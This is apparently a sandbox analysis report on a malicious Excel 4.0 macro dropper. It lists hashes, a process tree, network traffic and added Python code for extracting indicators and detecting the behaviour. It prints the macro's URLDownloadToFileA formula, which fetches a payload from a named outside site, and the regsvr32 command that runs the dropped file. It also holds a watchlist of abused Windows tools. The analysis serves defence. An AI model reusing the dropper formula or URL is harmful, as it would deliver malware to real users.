Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/11/2024, 18:55 UTC

General

  • Target

    b9fb685c6798605b90ac09b9f7f79e8c7005fe6692dfd96e35c49cf780692a21.xlsm

  • Size

    46KB

  • MD5

    1d0ae7c32b03acddbbc25b8b22f0f1f8

  • SHA1

    9c28dfbb95ade01bd67c98d756b6c3584dd4d0b5

  • SHA256

    b9fb685c6798605b90ac09b9f7f79e8c7005fe6692dfd96e35c49cf780692a21

  • SHA512

    44c74cbcb20878c280a756326880c1e73f0a45c75da55964385c51d1b880c086741928f8c5b0540b568b727d25670091bb0e072feec36c5a2a8321b082ca46f5

  • SSDEEP

    768:X5WHFKfQzXTmbfRzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+UP6UCIHcX:XwF+OXabfFtT5fTR4Lh1NisFYBc3cr+z

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://nataliapereira.com/wp-admin/pE8xYY3x6p/", "..\dw1.ocx")
URLs
xlm40.dropper

http://nataliapereira.com/wp-admin/pE8xYY3x6p/
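As an added example (not part of the sandbox report or of the sample), the Python below parses the recovered CALL() formula into its DLL, export, type text and parameters, then pulls out the download URL and drop path as IoCs. The tokenizer handles Excel's doubled-quote string escape, so a comma inside a URL or path does not break the split. resolve_drop_path shows why the relative "..\dw1.ocx" ended up at C:\Users\Admin\dw1.ocx while the document was opened from AppData\Local\Temp: the path is resolved against Excel's working directory, not the document's folder. The working directory used in the usage is an assumption for illustration; the report does not state it.

```python
import ntpath
import re

# Constructed sample: the Excel 4.0 (XLM) formula recovered by the sandbox.
# The backslash is doubled only for Python; the macro text has a single one.
SAMPLE_FORMULA = (
    '=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, '
    '"http://nataliapereira.com/wp-admin/pE8xYY3x6p/", "..\\dw1.ocx")'
)

_CALL_RE = re.compile(r'^\s*=\s*CALL\s*\((.*)\)\s*$', re.I | re.S)
_NUMBER_RE = re.compile(r'-?\d+(?:\.\d+)?')


def split_call_args(body: str) -> list:
    """Tokenise a CALL() argument list. Excel quotes strings with " and
    escapes an embedded quote by doubling it (""), so a naive split on
    commas would break on URLs or paths that contain commas."""
    args, pos = [], 0
    while pos < len(body):
        ch = body[pos]
        if ch in ' \t\r\n,':
            pos += 1
        elif ch == '"':
            buf, pos = [], pos + 1
            while True:
                if pos >= len(body):
                    raise ValueError('unterminated string literal')
                if body[pos] == '"':
                    if body[pos + 1:pos + 2] == '"':   # "" -> literal quote
                        buf.append('"')
                        pos += 2
                        continue
                    pos += 1                           # closing quote
                    break
                buf.append(body[pos])
                pos += 1
            args.append(''.join(buf))
        else:
            m = _NUMBER_RE.match(body, pos)
            if not m:
                raise ValueError(f'unexpected token at offset {pos}: {body[pos:pos + 10]!r}')
            tok = m.group(0)
            args.append(float(tok) if '.' in tok else int(tok))
            pos = m.end()
    return args


def parse_call(formula: str) -> dict:
    """Return the DLL, export, type text and parameters of an XLM CALL()."""
    m = _CALL_RE.match(formula)
    if not m:
        raise ValueError('not a CALL() formula')
    args = split_call_args(m.group(1))
    if len(args) < 3:
        raise ValueError('CALL needs at least dll, function and type_text')
    dll, func, type_text, *params = args
    # type_text: first letter is the return type, then one letter per parameter.
    return {'dll': dll, 'function': func, 'type_text': type_text, 'params': params}


def extract_dropper_iocs(formula: str) -> dict:
    """Pull the download URL and drop path from a urlmon!URLDownloadToFile* CALL.
    URLDownloadToFile takes the destination path as the argument after the URL."""
    call = parse_call(formula)
    iocs = {'dll': call['dll'], 'function': call['function'], 'url': None, 'dest': None}
    strings = [p for p in call['params'] if isinstance(p, str)]
    for i, s in enumerate(strings):
        if re.match(r'https?://', s, re.I):
            iocs['url'] = s
            if i + 1 < len(strings):
                iocs['dest'] = strings[i + 1]
            break
    # Anything without a drive letter or UNC prefix is resolved at run time
    # against the Office process's working directory.
    iocs['dest_is_relative'] = bool(iocs['dest']) and not re.match(r'^([A-Za-z]:|\\\\)', iocs['dest'])
    return iocs


def resolve_drop_path(dest: str, excel_cwd: str) -> str:
    """Resolve a relative drop path the way Windows does: against the process's
    current directory, not the folder the .xlsm was opened from."""
    return ntpath.normpath(ntpath.join(excel_cwd, dest))


if __name__ == '__main__':
    iocs = extract_dropper_iocs(SAMPLE_FORMULA)
    print(iocs)
    # Assumed working directory for illustration; the report does not state it.
    print(resolve_drop_path(iocs['dest'], r'C:\Users\Admin\Documents'))
```

Because the destination is relative, the same macro drops its file in different places depending on how Excel was launched, so hunting should key on the file name and hash (dw1.ocx, SHA256 3bb404...) rather than the full path.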

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b9fb685c6798605b90ac09b9f7f79e8c7005fe6692dfd96e35c49cf780692a21.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:5060
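The process tree and the HTTP traffic recorded for this run give two independent detection opportunities: an Office process spawning regsvr32.exe with a module path that is relative (so resolved against Excel's working directory) or lives in a user-writable location, and an Office process issuing a download with the IE7-compatible User-Agent that urlmon's URLDownloadToFile sends by default, while Excel's own roaming-settings call on this page identifies itself as MS-WebServices/1.0. The Python below is an added example, not from the report or any vendor, run over events constructed from the report; the msiexec and splwow64 rows and the document name are invented for contrast. Note that the fetched object was served as text/html and the dropped dw1.ocx is 1KB, so regsvr32 most likely had nothing valid to load; the rules fire on the behaviour, not on whether a payload ran.

```python
import ntpath
import re

OFFICE_APPS = {'excel.exe', 'winword.exe', 'powerpnt.exe', 'outlook.exe', 'msaccess.exe', 'mspub.exe'}
# Children an Office application has no business launching; regsvr32 is the one seen here.
SPAWN_WATCHLIST = {'regsvr32.exe', 'rundll32.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe',
                   'cmd.exe', 'powershell.exe', 'certutil.exe', 'bitsadmin.exe'}
USER_WRITABLE = re.compile(r'\\(users|programdata|temp|appdata)\\', re.I)
# Default User-Agent urlmon sends from URLDownloadToFile; Office's own traffic does not use it.
LEGACY_IE_UA = 'Mozilla/4.0 (compatible; MSIE 7.0;'

EXCEL = r'C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE'

# Constructed events modelled on the report; benign rows are invented for contrast.
EVENTS = [
    {'type': 'process', 'pid': 1980, 'image': EXCEL, 'parent_image': r'C:\Windows\explorer.exe',
     'cmdline': f'"{EXCEL}" "C:\\Users\\Admin\\AppData\\Local\\Temp\\sample.xlsm"'},
    {'type': 'http', 'pid': 1980, 'image': EXCEL,
     'url': 'https://roaming.officeapps.live.com/rs/RoamingSoapService.svc',
     'user_agent': 'MS-WebServices/1.0'},
    {'type': 'http', 'pid': 1980, 'image': EXCEL,
     'url': 'http://nataliapereira.com/wp-admin/pE8xYY3x6p/',
     'user_agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; '
                   '.NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)'},
    {'type': 'process', 'pid': 5060, 'image': r'C:\Windows\SysWow64\regsvr32.exe', 'parent_image': EXCEL,
     'cmdline': r'C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx'},
    {'type': 'process', 'pid': 4100, 'image': r'C:\Windows\System32\regsvr32.exe',
     'parent_image': r'C:\Windows\System32\msiexec.exe',
     'cmdline': r'regsvr32.exe /s "C:\Program Files\Vendor\ctl.ocx"'},
    {'type': 'process', 'pid': 4200, 'image': r'C:\Windows\splwow64.exe', 'parent_image': EXCEL,
     'cmdline': r'C:\Windows\splwow64.exe 12288'},
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def cmdline_tokens(cmdline: str) -> list:
    """Split a Windows command line, keeping quoted paths with spaces as one token."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def regsvr32_target(cmdline: str):
    """The module regsvr32 will load: the last argument that is not a switch."""
    toks = cmdline_tokens(cmdline)[1:]          # drop the image itself
    args = [t for t in toks if not t.startswith(('/', '-'))]
    return args[-1] if args else None


def is_suspicious_module_path(path) -> bool:
    """Relative paths resolve against the parent's working directory (this is how
    ..\\dw1.ocx landed in C:\\Users\\Admin); user-writable locations are the other red flag."""
    if not path:
        return False
    if not re.match(r'^(?:[A-Za-z]:\\|\\\\)', path):
        return True
    return bool(USER_WRITABLE.search(path))


def detect(events: list) -> list:
    """Apply the three rules to a list of process-creation and HTTP events."""
    alerts = []
    for ev in events:
        if ev['type'] == 'process':
            parent, child = basename(ev['parent_image']), basename(ev['image'])
            if parent in OFFICE_APPS and child in SPAWN_WATCHLIST:
                alerts.append({'rule': 'office_spawns_lolbin', 'pid': ev['pid'], 'detail': f'{parent} -> {child}'})
            if child == 'regsvr32.exe':
                target = regsvr32_target(ev['cmdline'])
                if is_suspicious_module_path(target):
                    alerts.append({'rule': 'regsvr32_untrusted_module', 'pid': ev['pid'], 'detail': target})
        elif ev['type'] == 'http':
            if basename(ev['image']) in OFFICE_APPS and ev.get('user_agent', '').startswith(LEGACY_IE_UA):
                alerts.append({'rule': 'office_urlmon_download', 'pid': ev['pid'], 'detail': ev['url']})
    return alerts


if __name__ == '__main__':
    for alert in detect(EVENTS):
        print(alert)
```

The User-Agent rule is the weakest of the three on its own, since any urlmon caller inside Office (including add-ins) produces the same string; it earns its place as a correlator that ties the download to the regsvr32 launch a second later, which is the sequence the Processes and Network sections show.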

Network

  • flag-us
    DNS
    196.249.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    196.249.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    ukw-azsc-000.roaming.officeapps.live.com
    ukw-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-ukw-buff-azsc-000.ukwest.cloudapp.azure.com
    osiprod-ukw-buff-azsc-000.ukwest.cloudapp.azure.com
    IN A
    52.109.32.7
  • flag-gb
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    EXCEL.EXE
    Remote address:
    52.109.32.7:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_143
    X-OfficeVersion: 16.0.18311.30577
    X-OfficeCluster: ukw-000.roaming.officeapps.live.com
    Content-Security-Policy-Report-Only: script-src 'nonce-2QjDDuxdmtytMtq9+W/5iAChuUSZw4g27hJOX0dZaspGCMhtLHgeCPpG2qdAZuecHfpEzjv8/nNjZLAZFxFCz6YKEuiTicNTb0NsGOnJ27GWXtwrV/RAC7P4Sm0CtO9zo2c7YOmGlQ8uJ6+ef1hiD/a+UMro4eVzLiRXmSIbo6M=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
    X-CorrelationId: b40f8fa4-db32-48fd-8245-f62c7ca6b36c
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 18:55:48 GMT
    Content-Length: 654
  • flag-us
    DNS
    nataliapereira.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    nataliapereira.com
    IN A
    Response
    nataliapereira.com
    IN A
    154.49.245.69
  • flag-fr
    GET
    http://nataliapereira.com/wp-admin/pE8xYY3x6p/
    EXCEL.EXE
    Remote address:
    154.49.245.69:80
    Request
    GET /wp-admin/pE8xYY3x6p/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: nataliapereira.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Wed, 20 Nov 2024 18:55:49 GMT
    server: LiteSpeed
    location: https://nataliapereira.com/wp-admin/pE8xYY3x6p/
    platform: hostinger
    panel: hpanel
    content-security-policy: upgrade-insecure-requests
  • flag-fr
    GET
    https://nataliapereira.com/wp-admin/pE8xYY3x6p/
    EXCEL.EXE
    Remote address:
    154.49.245.69:443
    Request
    GET /wp-admin/pE8xYY3x6p/ HTTP/2.0
    host: nataliapereira.com
    accept: */*
    ua-cpu: AMD64
    accept-encoding: gzip, deflate
    user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/2.0 200
    content-type: text/html
    content-length: 974
    content-encoding: gzip
    vary: Accept-Encoding
    date: Wed, 20 Nov 2024 18:55:50 GMT
    server: LiteSpeed
    cache-control: no-cache,no-store
    x-frame-options: SAMEORIGIN
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
  • flag-us
    DNS
    18.89.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.89.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    7.32.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    7.32.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    69.245.49.154.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    69.245.49.154.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    68.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    68.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    125.21.192.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    125.21.192.23.in-addr.arpa
    IN PTR
    Response
    125.21.192.23.in-addr.arpa
    IN PTR
    a23-192-21-125.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    137.71.105.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    137.71.105.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    40.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    40.134.221.88.in-addr.arpa
    IN PTR
    Response
    40.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-40.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 52.109.32.7:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    EXCEL.EXE
    1.8kB
    8.2kB
    12
    11

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 154.49.245.69:80
    http://nataliapereira.com/wp-admin/pE8xYY3x6p/
    http
    EXCEL.EXE
    870 B
    1.3kB
    12
    4

    HTTP Request

    GET http://nataliapereira.com/wp-admin/pE8xYY3x6p/

    HTTP Response

    301
  • 154.49.245.69:443
    https://nataliapereira.com/wp-admin/pE8xYY3x6p/
    tls, http2
    EXCEL.EXE
    1.4kB
    6.2kB
    17
    13

    HTTP Request

    GET https://nataliapereira.com/wp-admin/pE8xYY3x6p/

    HTTP Response

    200
  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    EXCEL.EXE
    73 B
    243 B
    1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.32.7

  • 8.8.8.8:53
    nataliapereira.com
    dns
    EXCEL.EXE
    64 B
    80 B
    1
    1

    DNS Request

    nataliapereira.com

    DNS Response

    154.49.245.69

  • 8.8.8.8:53
    18.89.109.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    18.89.109.52.in-addr.arpa

  • 8.8.8.8:53
    7.32.109.52.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    7.32.109.52.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    69.245.49.154.in-addr.arpa
    dns
    72 B
    72 B
    1
    1

    DNS Request

    69.245.49.154.in-addr.arpa

  • 8.8.8.8:53
    68.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    68.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    125.21.192.23.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    125.21.192.23.in-addr.arpa

  • 8.8.8.8:53
    137.71.105.51.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    137.71.105.51.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    40.134.221.88.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    40.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\dw1.ocx

    Filesize

    1KB

    MD5

    1326c16a18441423830933fbb3a6a290

    SHA1

    d62b5f0ec9ae7a82209938c347311519b9fc1084

    SHA256

    3bb40456027c77d05b991e4686f10e51739a6ebdca3e33ec5edcd1e2c28b34cf

    SHA512

    2b9076d43ccc836c89bcd4cc1946008b1d0268edf432d37659960f4ffb9836ca65e638b61305f374ba71b2fa21ac3210482c0e6287288e75bcd44d4fbeb3e528

  • memory/1980-16-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-10-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-2-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

  • memory/1980-4-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

  • memory/1980-5-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

  • memory/1980-7-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-0-0x00007FFF1486D000-0x00007FFF1486E000-memory.dmp

    Filesize

    4KB

  • memory/1980-9-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-14-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-13-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-3-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

  • memory/1980-15-0x00007FFED2240000-0x00007FFED2250000-memory.dmp

    Filesize

    64KB

  • memory/1980-6-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-12-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-11-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-8-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-17-0x00007FFED2240000-0x00007FFED2250000-memory.dmp

    Filesize

    64KB

  • memory/1980-19-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-18-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-1-0x00007FFED4850000-0x00007FFED4860000-memory.dmp

    Filesize

    64KB

  • memory/1980-38-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-39-0x00007FFF1486D000-0x00007FFF1486E000-memory.dmp

    Filesize

    4KB

  • memory/1980-40-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB

  • memory/1980-44-0x00007FFF147D0000-0x00007FFF149C5000-memory.dmp

    Filesize

    2.0MB
